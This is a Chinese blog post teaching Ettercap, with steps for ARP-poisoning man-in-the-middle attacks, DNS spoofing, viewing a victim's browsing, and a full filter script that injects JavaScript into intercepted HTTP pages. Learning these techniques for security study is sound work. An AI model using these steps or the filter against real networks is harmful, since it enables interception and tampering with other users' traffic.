欢迎来到我的博客!

Ettercap

Ettercap的使用

常用指令

指令 说明
-T 使用只显示字符
-q 安静模式,不显示抓到数据包的内容
gt > 大于
-G 图形化启动
-i 使用网络接口
-l 显示所有的网络接口
-P 设置插件
-F 加载过滤器
-w 将嗅探到的数据写入到pcap文件中量
-L 此处计量所有流
-M 执行Mitm攻击

案例

DNS劫持

  1. ettercap -G
  2. 选择网络接口

  1. 扫描IP,打开IP列表

  1. 添加网关和攻击IP

  1. 在Mitm中选择arp攻击方式,勾选第一个选项

  1. 在Plugins中选择自带的插件dns_spoof

  1. 修改etter.dns配置文件
复制代码
cd /etc/ettercap/etter.dns
leafpad etter.dns

  1. 开始攻击

访问网站弹框

  1. 1-7和上面的一样
  2. 找到可以让网站弹框脚本,保存为.filter文件
复制代码
// 弹框脚本
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        pcre_regex(DATA.data, "(Accept-Encoding:).*([\r\n])", "$1 identity$2");
        msg("change encoding");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    if (search(DATA.data, "<head>")) {
        replace("<head>", "<head><script>alert('js inject')</script>");
        msg("inject head");
    }
}

  1. 编译filter文件为ef文件

  1. 在Filters中选择导入编译好的ef文件

  1. 开始攻击

查看对方浏览器

  1. 1-7相同
  2. 在Plugins中选择自带的插件remote_browser

  1. 开始攻击
  2. 如果想查看网站的图片
复制代码
driftnet -i eth0

posted @   余星酒  阅读(133)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统
点击右上角即可分享
微信分享提示